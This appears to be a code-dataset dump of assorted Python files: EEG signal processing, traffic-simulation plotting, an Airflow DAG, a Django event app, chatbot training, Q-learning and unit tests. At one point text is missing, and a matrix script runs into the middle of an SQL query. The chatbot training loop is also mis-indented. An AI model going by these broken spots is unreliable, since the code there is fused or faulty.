= 2\n b = 1\n# If the required index is 0th position print the first lucas number\n if n == 0:\n print (a)\n else:\n# Loop to move the latest number to prior and new number to the next calculated variable\n for i in range(n):\n next = a + b\n a = b\n b = next\n print (a)\n","sub_path":"students/vvinodh/Lesson2/series_lucas.py","file_name":"series_lucas.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"533494256","text":"import argparse\nimport time\nimport brainflow\nimport numpy as np\n\nimport pandas as pd\nimport matplotlib\nmatplotlib.use ('Agg')\nimport matplotlib.pyplot as plt\n\nfrom brainflow.board_shim import BoardShim, BrainFlowInputParams, LogLevels\nfrom brainflow.data_filter import DataFilter, FilterTypes, AggOperations\n\n\ndef main ():\n parser = argparse.ArgumentParser ()\n # use docs to check which parameters are required for specific board, e.g. for Cyton - set serial port,\n parser.add_argument ('--ip-port', type = int, help = 'ip port', required = False, default = 0)\n parser.add_argument ('--ip-protocol', type = int, help = 'ip protocol, check IpProtocolType enum', required = False, default = 0)\n parser.add_argument ('--ip-address', type = str, help = 'ip address', required = False, default = '')\n parser.add_argument ('--serial-port', type = str, help = 'serial port', required = False, default = '')\n parser.add_argument ('--mac-address', type = str, help = 'mac address', required = False, default = '')\n parser.add_argument ('--other-info', type = str, help = 'other info', required = False, default = '')\n parser.add_argument ('--board-id', type = int, help = 'board id, check docs to get a list of supported boards', required = True)\n parser.add_argument ('--log', action = 'store_true')\n args = parser.parse_args ()\n\n params = BrainFlowInputParams ()\n params.ip_port = args.ip_port\n params.serial_port = args.serial_port\n params.mac_address = args.mac_address\n params.other_info = args.other_info\n params.ip_address = args.ip_address\n params.ip_protocol = args.ip_protocol\n\n if (args.log):\n BoardShim.enable_dev_board_logger ()\n else:\n BoardShim.disable_board_logger ()\n\n # demo how to read data as 2d numpy array\n board = BoardShim (args.board_id, params)\n board.prepare_session ()\n board.start_stream ()\n BoardShim.log_message (LogLevels.LEVEL_INFO.value, 'start sleeping in the main thread')\n time.sleep (10)\n # data = board.get_current_board_data (256) # get latest 256 packages or less, doesnt remove them from internal buffer\n data = board.get_board_data () # get all data and remove it from internal buffer\n board.stop_stream ()\n board.release_session ()\n\n # demo how to convert it to pandas DF and plot data\n eeg_channels = BoardShim.get_eeg_channels (args.board_id)\n df = pd.DataFrame (np.transpose (data))\n print ('Data From the Board')\n print (df.head (10))\n plt.figure ()\n df[eeg_channels].plot (subplots = True)\n plt.savefig ('before_processing.png')\n\n # demo for data serialization\n DataFilter.write_file (data, 'test.csv', 'w')\n restored_data = DataFilter.read_file ('test.csv')\n restored_df = pd.DataFrame (np.transpose (restored_data))\n print ('Data From the File')\n print (restored_df.head (10))\n\n # demo how to perform signal processing\n for count, channel in enumerate (eeg_channels):\n if count == 0:\n DataFilter.perform_bandpass (data[channel], BoardShim.get_sampling_rate (args.board_id), 15.0, 6.0, 4, FilterTypes.BESSEL.value, 0)\n elif count == 1:\n DataFilter.perform_bandstop (data[channel], BoardShim.get_sampling_rate (args.board_id), 5.0, 1.0, 3, FilterTypes.BUTTERWORTH.value, 0)\n elif count == 2:\n DataFilter.perform_lowpass (data[channel], BoardShim.get_sampling_rate (args.board_id), 9.0, 5, FilterTypes.CHEBYSHEV_TYPE_1.value, 1)\n elif count == 3:\n DataFilter.perform_highpass (data[channel], BoardShim.get_sampling_rate (args.board_id), 3.0, 4, FilterTypes.BUTTERWORTH.value, 0)\n elif count == 4:\n DataFilter.perform_rolling_filter (data[channel], 3, AggOperations.MEAN.value)\n elif count == 5:\n DataFilter.perform_rolling_filter (data[channel], 3, AggOperations.MEDIAN.value)\n\n df = pd.DataFrame (np.transpose (data))\n print ('Data After Processing')\n print (df.head (10))\n plt.figure ()\n df[eeg_channels].plot (subplots = True)\n plt.savefig ('after_processing.png')\n\n\nif __name__ == \"__main__\":\n main ()\n","sub_path":"python-package/examples/brainflow_get_data.py","file_name":"brainflow_get_data.py","file_ext":"py","file_size_in_byte":4133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"163203001","text":"\ndef main():\n r=int(input())\n c=int(input())\n m=r*c\n Lista1=[]\n Lista2=[]\n index=0\n if r==c:\n for i in range (m):\n n=int(input())\n Lista1.append(n)\n while index 0 AND entranceTime < {} AND origin = {} AND destination = {}'.format(maxT, oriId, desId))\n vehTTime = cur.fetchall()\n con.close()\n # Key: essentially the timestep (tStep below), this is because we are #\n # targeting a specific O/D pair. #\n tStepAccumTime = {}\n tStepAccumCount= {}\n tStepMinTime = {}\n for i in xrange(len(vehTTime)):\n thisTStep = math.ceil(vehTTime[i][1]/60)\n if thisTStep in tStepAccumTime:\n tStepAccumTime[thisTStep] += vehTTime[i][2]\n tStepAccumCount[thisTStep]+= 1\n if vehTTime[i][2] < tStepMinTime[thisTStep]:\n tStepMinTime[thisTStep] = vehTTime[i][2]\n else:\n tStepAccumTime[thisTStep] = vehTTime[i][2]\n tStepAccumCount[thisTStep] = 1\n tStepMinTime[thisTStep] = vehTTime[i][2]\n tStep = []\n absNash = []\n rltNash = []\n for key in tStepAccumTime.keys():\n tStep.append(key)\n absNash.append(tStepAccumTime[key]/tStepAccumCount[key] - tStepMinTime[key])\n rltNash.append(tStepAccumTime[key]/(tStepAccumCount[key] * tStepMinTime[key]) - 1)\n zipped = zip(tStep, absNash, rltNash)\n zipped.sort()\n unzip = zip(*zipped)\n sTStep, sAbsNash, sRltNash = map(list, unzip)\n return sTStep, sAbsNash, sRltNash\n\ndef sortBasedOnPercentage(percentage, absNash, rltNash):\n #----------------------------------------------------------#\n # Helper function to sort all data based on the percentage #\n # of App users #\n #----------------------------------------------------------#\n zipped = zip(percentage, absNash, rltNash)\n zipped.sort()\n unzip = zip(*zipped)\n sPercentage, sAbsNash, sRltNash = map(list, unzip)\n return sPercentage, sAbsNash, sRltNash\n\ndef traverseMultiDB(fileList, debug, maxT):\n #----------------------------------------------------------#\n # Traverses multiple DB and return the average travel time #\n # (i.e. TTime) of app users and non-app users #\n #----------------------------------------------------------#\n percentage = []\n absNash = []\n rltNash = []\n tStep = []\n oriId, desId = getODPair(fileList[0])\n for filename in fileList:\n thisPercentage = getPercentage(filename)\n thisTStep, thisAbsNash, thisRltNash = extractSingleDB(filename, thisPercentage, debug, oriId, desId, maxT)\n percentage.append(thisPercentage)\n absNash.append(thisAbsNash)\n rltNash.append(thisRltNash)\n tStep = thisTStep\n percentage, absNash, rltNash = sortBasedOnPercentage(percentage, absNash, rltNash)\n return percentage, tStep, absNash, rltNash\n\ndef getColorChoices():\n #-----------------------------------------------------------#\n # Helper function for returning the ten color choices for #\n # matplotlib, namely 'C0', 'C1', ..., and 'C9' #\n #-----------------------------------------------------------#\n ret = []\n ret.append('b') \n ret.append('g') \n ret.append('r') \n ret.append('c') \n ret.append('m') \n ret.append('y') \n ret.append('k') \n ret.append('w')\n return ret, 0\n\ndef generatePlot(percentage, timeStep, absNash, rltNash):\n #-----------------------------------------------------------#\n # Helper function for generating a plot that compares the #\n # travel time of App users and non-App users with respect to#\n # the percentage of App users in the network #\n #-----------------------------------------------------------#\n '''\n font = {'family':'normal',\n 'weight':'bold',\n 'size':6}\n plt.rc('font', **font)\n # Plot multiple figures #\n plt.figure(1, figsize = (24, 14), dpi = 100)\n for i in xrange(len(percentage)):\n thisAx = plt.subplot(5, 4, i + 1)\n thisAx.set_xlabel('Time Step (#)')\n thisAx.set_ylabel('Absolute Nash Distance (sec)')\n thisAx.plot(timeStep, absNash[i], color = (0,0,1), label = 'Abs Nash Distance', dashes = [10, 5], linewidth = 2.0)\n thisAx.set_ylim(0, max(absNash[i])*1.1)\n # THIS LINE IS ONLY FOR PLOTTING A SINGLE LINE THAT REPRESENTS THE #\n # START OF THE ACCIDENT, THIS IS NOT FOR ANY GENERALIZED PLOTTING! #\n #thisAx.plot([30, 30], [0, max(absNash[i])*1.1], color = (0,0,0), dashes = [2, 2], linewidth = 2.0)\n #thisAx.plot([60, 60], [0, max(absNash[i])*1.1], color = (0,0,0), dashes = [2, 2], linewidth = 2.0)\n #------------------------------------------------------------------#\n thisAx2 = thisAx.twinx()\n thisAx2.set_ylabel('Relative Nash Distance (%)')\n thisAx2.plot(timeStep, rltNash[i], color = (1,0,0), label = 'Rlt Nash Distance', dashes = [10, 5], linewidth = 2.0)\n thisAx.set_title('Nash Distance for app user percentage {}%'.format(percentage[i]))\n hand1, lab1 = thisAx.get_legend_handles_labels()\n hand2, lab2 = thisAx2.get_legend_handles_labels()\n firstLegend = plt.legend(handles = hand1, loc = 1)\n dummy = plt.gca().add_artist(firstLegend)\n plt.legend(handles = hand2, loc = 2)\n plt.savefig('outputFigures/single_timestep_ND.png')\n '''\n # For plotting the timestep - abs Nash Distance graph #\n font = {'family':'normal',\n 'weight':'bold',\n 'size':20}\n plt.rc('font', **font)\n fig, ax = plt.subplots(figsize = (24, 14), dpi = 100)\n for i in xrange(len(percentage)):\n ax.plot(timeStep, absNash[i], color = (1 - float(percentage[i])/100, 0, float(percentage[i])/100), \\\n label = 'Abs Nash Distance of percentage {}'.format(percentage[i]), \\\n linewidth = 4.0)\n hand, lab = ax.get_legend_handles_labels()\n plt.legend(handles = hand, loc = 1)\n ax.set_ylim(0, max(max(absNash)) * 2)\n ax.set_xlabel('Time Step (#)')\n ax.set_ylabel('Absolute Nash Distance (sec)')\n ax.set_title('Absolute Nash Distance for Different App User Percentages')\n if plotEvent:\n ax.plot([eventStart, eventStart], [0, max(max(absNash)) * 2], color = (0, 0, 0), dashes = [2, 2], linewidth = 4.0)\n ax.plot([eventEnd, eventEnd], [0, max(max(absNash)) * 2], color = (0, 0, 0), dashes = [2, 2], linewidth = 4.0)\n plt.savefig('outputFigures/absND.png', dpi = 'figure')\n\n # For plotting the timestep - rlt Nash Distance graph #\n font = {'family':'normal',\n 'weight':'bold',\n 'size':20}\n plt.rc('font', **font)\n fig, ax = plt.subplots(figsize = (24, 14), dpi = 100)\n for i in xrange(len(percentage)):\n ax.plot(timeStep, rltNash[i], color = (0, 1 - float(percentage[i])/100, float(percentage[i])/100), \\\n label = 'Rlt Nash Distance of percentage {}'.format(percentage[i]), \\\n linewidth = 4.0)\n hand, lab = ax.get_legend_handles_labels()\n plt.legend(handles = hand, loc = 1)\n ax.set_ylim(0, max(max(rltNash)) * 2)\n ax.set_xlabel('Time Step (#)')\n ax.set_ylabel('Relative Nash Distance (sec)')\n ax.set_title('Relative Nash Distance for Different App User Percentages')\n if plotEvent:\n ax.plot([eventStart, eventStart], [0, max(max(absNash)) * 2], color = (0, 0, 0), dashes = [2, 2], linewidth = 4.0)\n ax.plot([eventEnd, eventEnd], [0, max(max(absNash)) * 2], color = (0, 0, 0), dashes = [2, 2], linewidth = 4.0)\n plt.savefig('outputFigures/rltND.png', dpi = 'figure')\n \n print('plotting complete, results saved under ./outputFigures/\\n')\n\ndef printUsage(): \n print('usage: \\n python extractMultiSQLite.py directoryName showAllMessages maxEntranceTime')\n print('directoryName: the directory in which the sqlite databases are stored')\n print('showAllMessages: use \"true\" to output all messages, recommended')\n print('maxEntranceTime: the maximum time cars are allowed to enter the network')\n print('system exiting...')\n sys.exit()\n\ndef std4Call(dirName, maxTime):\n print('---------------------------------------')\n print(' executing std4 plots ')\n print('---------------------------------------')\n fileList = getAllFilenames(dirName)\n percentage, timeStep, absNash, rltNash = traverseMultiDB(fileList, True, maxTime)\n generatePlot(percentage, timeStep, absNash, rltNash)\n\n# Main code starts here\nif __name__ == '__main__':\n if len(sys.argv) != 4:\n printUsage()\n dirName = sys.argv[1]\n debug = sys.argv[2]\n maxEntranceTime = float(sys.argv[3])\n fileList = getAllFilenames(dirName)\n dm.printObjFiles(fileList, debug)\n percentage, timeStep, absNash, rltNash = traverseMultiDB(fileList, debug, maxEntranceTime)\n generatePlot(percentage, timeStep, absNash, rltNash)\n","sub_path":"std4_elapsedTime_ND.py","file_name":"std4_elapsedTime_ND.py","file_ext":"py","file_size_in_byte":10656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"539660367","text":"from airflow.models import DAG\nfrom airflow.operators.dummy_operator import DummyOperator\nfrom airflow.operators.python_operator import PythonOperator\nimport os\nfrom datetime import datetime, timedelta\n\ndefault_args = {\n 'owner':'babaj',\n 'retries': 1,\n 'email_on_retry':'no_mail@nohost.org',\n 'email_on_failure':'no_mail@nohost.org',\n 'depends_on_past':False,\n 'start_date':datetime(2009,12,1)}\n\ndag = DAG('daily_dag', default_args=default_args, catchup=True, schedule_interval='@daily')\n\ndef func_1(path, filename):\n f = open(os.path.join(path, filename), 'a')\n f.write(f'Time: {datetime.now().hour}:{datetime.now().minute:02}:{datetime.now().second:02}\\n')\n f.close()\n\nfunc_2 = lambda: print(2 + 2)\n\nrun_first = PythonOperator(\n task_id='first_daily_task',\n python_callable=func_1,\n op_kwargs={'path':'/home/yurii/Desktop/new', 'filename':'daily.txt'},\n dag=dag)\n\nrun_second = PythonOperator(task_id='second_daily_task',\n python_callable=func_2,\n dag=dag)\n\nrun_first >> run_second\n","sub_path":"dags_archive/daily.py","file_name":"daily.py","file_ext":"py","file_size_in_byte":1029,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"149309372","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nclass Data(object):\n x=[]\n y=[]\n x_square=[]\n y_square=[]\n xy_multiply=[]\n m=0\n c=0\n \n\n def __init__(self,var1,var2):\n self.x=var1\n self.y=var2\n self.m=0\n self.c=0\n \n \n\n def CalcData(self):\n for itemX,ItemY in zip(self.x,self.y):\n self.x_square.append(itemX**2)\n self.y_square.append(ItemY**2)\n self.xy_multiply.append(itemX*ItemY)\n\n def CalcM(self):\n self.m=((len(self.x)*sum(self.xy_multiply))-(sum(self.x)*sum(self.y)))/((len(self.x)*sum(self.x_square)-sum(self.x)**2))\n \n def CalcC(self):\n self.c=((sum(self.y)*sum(self.x_square))-(sum(self.x)*sum(self.xy_multiply)))/((len(self.x)*sum(self.x_square))-sum(self.x)**2)\n \n def CalcPlot(self):\n x_plot=[]\n y_plot=[]\n\n for step in range(0,10):\n x_plot.append(step)\n y_plot.append(self.m*step+self.c)\n\n return x_plot,y_plot\n\n def CalcRMSE(self):\n RMSE=0\n for item1,item2 in zip(self.x,self.y):\n RMSE=RMSE+(item2-(self.m*item1+self.c))**2\n\n return RMSE\n\n def PrintData(self): \n for item1,item2,item3 in zip(self.x_square,self.y_square,self.xy_multiply):\n print(\"X^2: \",item1,\" Y^2: \",item2,\" X*Y\", item3)\n\n print(\"M: \",self.m)\n print(\"C: \",self.c)\n print(\"RMSE: \",round(self.CalcRMSE(),2))\n \n\ndef Foo():\n \n np.random.seed(5)\n\n #Testing set\n # x = np.arange(1, 101)\n # y = 3 * x + np.random.normal(0, 60, 100)\n \n x=[1,2,3,4,5]\n y=[2,4,5,4,5]\n\n # x = np.array([0, 1, 2, 3, 4, 5, 6, 7, 8, 9])\n # y = np.array([1, 3, 2, 5, 7, 8, 8, 9, 10, 12])\n\n worker= Data(x,y)\n worker.CalcData()\n worker.CalcM()\n worker.CalcC() \n worker.PrintData() \n\n \n\n #Points \n plt.plot(x,y,\"o\")\n #Line\n plt.plot(worker.CalcPlot()[0], worker.CalcPlot()[1], 'r-', lw=3)\n #plt.axis([0, 105, 0, 105])\n plt.xlabel(\"independant\")\n plt.ylabel(\"dependant\") \n\n\n\n plt.show()\n\n\n\nif __name__== \"__main__\":\n Foo()\n","sub_path":"LinearRegression.py","file_name":"LinearRegression.py","file_ext":"py","file_size_in_byte":2135,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"265559330","text":"#-*- coding: cp950 -*-\r\nimport sys,cgi,re,time,os,datetime\r\nfrom django.http import HttpResponse\r\nfrom django.shortcuts import render_to_response\r\nfrom django.template import TemplateDoesNotExist\r\nfrom django.http import HttpResponseRedirect\r\nfrom google.appengine.ext import db\r\nfrom google.appengine.api import users\r\nfrom db import ddl\r\nimport flowBase\r\n\r\ndef showEvent(request):\r\n # Retrieve Events from Database\r\n eventKey=request.GET.get('id')\r\n event=db.get(db.Key(eventKey))\r\n if not event:\r\n return HttpResponseRedirect('/')\r\n intVolunteerNeeded = event.volunteer_req - event.approved_count\r\n\r\n if event.min_age == 1 and event.max_age != 99:\r\n event.req_age = u'%d 歲以下' % event.max_age\r\n elif event.min_age != 1 and event.max_age == 99:\r\n event.req_age = u'%d 歲以上' % event.min_age\r\n elif event.min_age != 1 and event.max_age != 99:\r\n event.req_age = u'%d 歲至 %d 歲' % (event.min_age, event.max_age)\r\n\r\n dicData={'event': event,\r\n 'event_key':event.key(),\r\n 'base': flowBase.getBase(request, 'event'),\r\n 'page': 'home',\r\n 'needed': str(intVolunteerNeeded)}\r\n return render_to_response(r'event/event_home.html',dicData)\r\n\r\ndef applyEvent(request):\r\n eventKey=request.POST.get('event_key')\r\n if not eventKey or eventKey=='None':\r\n return HttpResponseRedirect('/')\r\n event=db.get(db.Key(eventKey))\r\n if not event:\r\n return HttpResponseRedirect('/')\r\n\r\n objUser=users.get_current_user()\r\n if not objUser:\r\n return HttpResponseRedirect(users.create_login_url(cgi.escape(request.path+'?event_id=%s'%eventKey)))\r\n objVolunteer=flowBase.getVolunteer(objUser)\r\n if not objVolunteer:\r\n template_values = {\r\n 'base': flowBase.getBase(request, 'event'),\r\n 'redirectURI': cgi.escape(request.path+'?event_id=%s'%eventKey),\r\n 'loginSuccess': False,\r\n }\r\n return render_to_response('loginProxy.html', template_values)\r\n \r\n intVolunteerEventItems = db.GqlQuery('select * from VolunteerEvent where volunteer_profile_ref = :1 and event_profile_ref = :2', objVolunteer, event).count()\r\n if intVolunteerEventItems > 0:\r\n strAlert=u'此活動您已經報名了'\r\n else:\r\n event.registerUser(objVolunteer)\r\n strAlert=u'報名成功 '\r\n\r\n dicData={'event': event,\r\n 'event_key':event.key(),\r\n 'base': flowBase.getBase(request, 'event'),\r\n 'needed': str(event.volunteer_req - event.approved_count),\r\n 'alertMsg':strAlert}\r\n return render_to_response(r'event/event_home.html',dicData)\r\n \r\n\r\ndef EmptyApply(request):\r\n eventKey=request.POST.get('event_id')\r\n #return HttpResponse(str(eventKey))\r\n EventProfile = db.GqlQuery('select * from EventProfile')\r\n for event in EventProfile:\r\n event.registered_count=0\r\n #event.registered_volunteer=[]\r\n event.put()\r\n\r\n VolunteerEvent = db.GqlQuery(\"select * from VolunteerEvent\")\r\n for item in VolunteerEvent:\r\n item.delete()\r\n return HttpResponse(u'已刪除VolunteerEvent所有資料,與清除EventProfile相對應欄位')\r\n\r\n","sub_path":"flow1.0/src/flow-site/eventView/eventInfo.py","file_name":"eventInfo.py","file_ext":"py","file_size_in_byte":3227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"293621292","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport os, sys\nimport time\nimport argparse\n\nimport numpy as np\nimport tensorflow as tf\n\nfrom model import Model\n\nimport load as ld\nimport pandas as pd\n\n\ndef main():\n parser = argparse.ArgumentParser()\n\n\n parser.add_argument('--model', type=str, default='lstm',\n help='rnn, gru, lstm or bn-lstm, default lstm')\n\n parser.add_argument('--bn_level', type=int, default=1,\n help='if model is bn-lstm, enable sequence-wise batch normalization with different level')\n\n parser.add_argument('--rnn_size', type=int, default=256,\n help='size of RNN hidden state')\n\n parser.add_argument('--num_layers', type=int, default=2,\n help='number of layers in RNN')\n\n parser.add_argument('--batch_size', type=int, default=1,\n help='minibatch size')\n\n parser.add_argument('--seq_length', type=int, default=40,\n help='RNN sequence length')\n\n parser.add_argument('--num_epochs', type=int, default=100,\n help='number of epochs')\n\n parser.add_argument('--learning_rate', type=float, default=0.0001,\n help='learning rate')\n\n parser.add_argument('--decay_rate', type=float, default=0.9,\n help='decay rate for rmsprop')\n\n parser.add_argument('--init_from', type=str, default=\"./data/\",\n help='''continue training from saved model at this path. Path must contain files saved by previous training process:\n 'config.pkl' : configuration;\n 'checkpoint' : paths to model file(s) (created by tensorflow).\n Note: this file contains absolute paths, be careful when moving files around;\n 'model.ckpt-*' : file(s) with model definition (created by tensorflow)''')\n parser.add_argument('--label_size',type=int,default=2000)\n args = parser.parse_args()\n train(args)\n\n\ndef train(args):\n file=open(\"/media/ada/软件/BaiduNetdiskDownload/ieee_zhihu_cup/ieee_zhihu_cup/question_eval.csv\",\"a\")\n topic_info = pd.read_csv(\"/media/ada/软件/BaiduNetdiskDownload/ieee_zhihu_cup/ieee_zhihu_cup/topic_num.txt\",\n header=None, sep=\"\\t\")\n char_embedding = ld.load_char_embedding()\n args.vocab_size = char_embedding.shape[0]\n\n global ckpt\n if args.init_from is not None:\n ckpt = tf.train.get_checkpoint_state(args.init_from)\n\n model = Model(args,True)\n\n\n #word_embedding = ld.load_word_embedding()\n\n\n\n\n with tf.Session() as sess:\n\n init = tf.global_variables_initializer()\n sess.run(init)\n saver = tf.train.Saver()\n\n if args.init_from is not None:\n saver.restore(sess, ckpt.model_checkpoint_path)\n\n num = 0\n header_list = []\n for i in range(1, 257, 1):\n header_list.append(str(i))\n x_ = []\n temp = []\n for i in range(256):\n temp.append(0)\n with open(\"/media/ada/软件/BaiduNetdiskDownload/ieee_zhihu_cup/ieee_zhihu_cup/question_eval_set.txt\",\"r\") as f:\n question_des = True\n # for i in range(200): #已经训练了200代\n # question_topic=f.readline().strip(\"\\n\").split(\"\\t\")\n while (True):\n\n question_des = f.readline().strip(\"\\n\").split(\"\\t\")\n num += 1\n if (num == 216467):\n break\n while (question_des):\n question_des = f.readline().strip(\"\\n\").split(\"\\t\")\n num+=1\n\n question_id = question_des[0]\n\n question_ct = question_des[1].split(\",\")\n '''\n question_wt = \\\n question_des.loc[question_des['question_id'] == int(question_id)][['question_name_word']].values[0][\n 0].split(\",\")\n question_cd = \\\n question_des.loc[question_des['question_id'] == int(question_id)][['question_des_char']].values[0][\n 0].split(\",\")\n question_wd = \\\n question_des.loc[question_des['question_id'] == int(question_id)][['question_des_word']].values[0][\n 0].split(\",\")\n '''\n\n question_ct_embedding = []\n\n\n\n if(len(question_ct)>args.seq_length):\n question_ct=question_ct[:args.seq_length]\n\n for question_ct_ in question_ct:\n if (len(char_embedding.loc[char_embedding['char'] == question_ct_]) == 0):\n temp = np.random.rand(256)\n question_ct_embedding.append(temp)\n\n\n\n\n else:\n question_ct_embedding.append(\n char_embedding.loc[char_embedding['char'] == question_ct_][header_list].values[0])\n\n while(len(question_ct_embedding)priority[n]):\n for k in range(3,n-1,-1):\n priority[k+1]=priority[k]\n index[k+1]=index[k]\n index[n] = m\n priority[n] = probablity[m]\n break\n\n\n\n\n print(num,question_id)\n buffer=str(question_id)\n #file.write(str(question_id))\n for k__ in range(5):\n #file.write(\",\"+str(topic_info[1][index[k__]]))\n buffer=buffer+(\",\"+str(topic_info[1][index[k__]]))\n #file.write(\"\\n\")\n buffer+=(\"\\n\")\n file.write(buffer)\n x_=[]\n if(num%10==0):\n file.flush()\n\n\n\n file.close()\nif __name__ == '__main__':\n main()\n\n","sub_path":"my_eval.py","file_name":"my_eval.py","file_ext":"py","file_size_in_byte":6475,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"9798659","text":"import logging\nfrom django.core.management.base import BaseCommand\n\nfrom twitterbot.tasks import get_followers_and_friends_task\n\nlogging.basicConfig(level=logging.INFO)\nlogger = logging.getLogger(__name__)\n\n\nclass Command(BaseCommand):\n\n help = 'Loads followers for given twitter user ' \\\n 'and saves them to DB (TargetTwitterAccount table)'\n\n def add_arguments(self, parser):\n parser.add_argument('username', nargs='+', type=str)\n parser.add_argument('account_owner', nargs='+', type=str)\n\n parser.add_argument(\n '--include-friends',\n action=\"store_true\",\n dest='friends',\n default=False,\n help='Additionally loads friends of twitter user'\n )\n\n def handle(self, *args, **options):\n self.stdout.write('Start process')\n get_followers_and_friends_task.delay(options)\n self.stdout.write('Process is executed in async mode. Enjoy!')\n","sub_path":"twitterbot/management/commands/getfollowers.py","file_name":"getfollowers.py","file_ext":"py","file_size_in_byte":952,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"266936315","text":"#WE import the necessary packages for our chatbot and initialize the variables we will use in our python project\r\n#The Data file is in JSON format so we used the json package to parse the JSON file into Python.\r\n\r\nimport nltk\r\nfrom nltk.stem import WordNetLemmatizer\r\nlemmatizer = WordNetLemmatizer()\r\nimport json\r\nimport pickle\r\nimport numpy as np\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Dense, Activation, Dropout\r\nfrom keras.optimizers import SGD\r\nimport random\r\n\r\nwords=[]\r\nclasses=[]\r\ndocuments=[]\r\nignore_words=['?', '!']\r\ndata_file = open('intents.json').read()\r\nintents = json.loads(data_file)\r\n\r\n#Process data\r\n#Iterate through the patterns and tokenize the sentence using nltk.word_tokenize() and append each word in the worlds list.\r\nfor intent in intents['intents']:\r\n for pattern in intent ['patterns']:\r\n #tokenize each word\r\n w = nltk.word_tokenize(pattern)\r\n words.extend(w)\r\n #Add documents in the corpus\r\n documents.append((w, intent['tag']))\r\n #add to our classes list\r\n if intent['tag'] not in classes:\r\n classes.append(intent['tag'])\r\n\r\n#Lemmmatizing is the process of converting a word into its leamma form and then creating a pickle file to store the python objects\r\n#which we will use while predicting.\r\n\r\n#Lemmatize, lower each word and remove duplicates\r\nwords = [lemmatizer.lemmatize(w.lower()) for w in words if w not in ignore_words]\r\nwords = sorted(list(set(words)))\r\n#sort classes\r\nclasses = sorted(list(set(classes)))\r\n#Documents = combination between patterns and intents \r\nprint (len(documents), \"documents\")\r\n#Classes = intents \r\nprint (len(classes), \"classes\", classes)\r\n#Words = all words, vocabulary\r\nprint (len(words), \"unique lemmatized words\", words)\r\n\r\npickle.dump(words,open('words.pkl', 'wb'))\r\npickle.dump(classes,open('classes.pkl', 'wb'))\r\n\r\n#Create training and testing data\r\n#input = pattern // output = class our input pattern belongs to \r\n#But we need to convert text into numbers.\r\n\r\n#create our training data\r\ntraining = []\r\n#create an empty array for our output\r\noutput_empty = [0] * len(classes)\r\n#training set, bag of words for each sentence\r\nfor doc in documents:\r\n #initialize our bag of words\r\n bag = []\r\n #list of tokenized words for the pattern \r\n pattern_words = doc[0]\r\n #lemmatize each word - create base word, in attempt to represent related words\r\n pattern_words = [lemmatizer.lemmatize(word.lower()) for word in pattern_words]\r\n#create our bag of words array with 1, if word match found in current pattern \r\nfor w in words:\r\n bag.append(1) if w in pattern_words else bag.append(0)\r\n #output is a '0' for each tag and '1' for current tag (for each pattern)\r\n output_row = list(output_empty)\r\n output_row[classes.index(doc[1])] = 1\r\n\r\n training.append([bag, output_row])\r\n\r\n#shuffle our features and turn into np.array\r\nrandom.shuffle(training)\r\ntraining = np.array(training)\r\n#create train and test lists. X - patterns, Y - intents\r\ntrain_x = list(training[:,0])\r\ntrain_y = list(training[:,1])\r\nprint(\"Training data created\")\r\n\r\n","sub_path":"DataScience_ML_DL_Projects/ChatBot/train_chatbot.py","file_name":"train_chatbot.py","file_ext":"py","file_size_in_byte":3114,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"563749579","text":"# %%\n\nimport numpy as np\nimport gym\nimport random\nimport time\nfrom IPython.display import clear_output\n\n# %%\n\n\nenv = gym.make(\"FrozenLake-v0\")\n\naction_space_size = env.action_space.n\nstate_space_size = env.observation_space.n\n\nq_table = np.zeros((state_space_size, action_space_size))\n\nprint(q_table)\n\n# %%\n\n\nnum_episodes = 10000\nmax_steps_per_episode = 100\n\nlearning_rate = 0.1\ndiscount_rate = 0.99\n\nexploration_rate = 1\nmax_exploration_rate = 1\nmin_exploration_rate = 0.001\nexploration_decay_rate = 0.001\n# %%\n# Watch our agent play Frozen Lake by playing the best action \n# from each state according to the Q-table\n\nfor episode in range(3):\n # initialize new episode params\n state = env.reset()\n done = False\n print(\"*****EPISODE \", episode+1, \"*****\\n\\n\\n\\n\")\n time.sleep(1)\n for step in range(max_steps_per_episode): \n\n clear_output(wait=True)\n env.render()\n time.sleep(0.3)\n\n # Show current state of environment on screen\n # Choose action with highest Q-value for current state \n # Take new action\n action = np.argmax(q_table[state,:]) \n new_state, reward, done, info = env.step(action)\n\n if done:\n clear_output(wait=True)\n env.render()\n if reward == 1:\n print(\"****You reached the goal!****\")\n time.sleep(3)\n else:\n print(\"****You fell through a hole!****\")\n time.sleep(3)\n clear_output(wait=True)\n break\n\n # Set new state\n state = new_state\nenv.close()\n","sub_path":"ReinforcementLearning/FrozenLake.py","file_name":"FrozenLake.py","file_ext":"py","file_size_in_byte":1600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"12477697","text":"# file_manager_test.py\n# Author: Daniel Jauregui\n\nimport unittest\nimport os\nimport datetime\nfrom random import randint\nimport sys\nsys.path.append(os.path.abspath(os.path.dirname(__file__)) + \"/../src/lib\")\nfrom file_manager import File\n\n\nclass FileManagerTest(unittest.TestCase):\n SRC_FOLDER = os.path.abspath(os.path.dirname(__file__)) + '/data/'\n CONFIG_FILE = SRC_FOLDER + 'config.cfg'\n CONFIG_DB_FILE = SRC_FOLDER + 'db.cfg'\n CREATE_FILE = SRC_FOLDER + 'Test_File.txt'\n DELETE_FILE = SRC_FOLDER + 'Test_to_deleted.txt'\n ADD_TEXT_FILE = SRC_FOLDER + 'Add_Text_to_File.txt'\n CONFIG_FILE_UPDATE = SRC_FOLDER + 'config_to_update.cfg'\n\n def test_file_manager_can_read_config_file(self):\n file_instance = 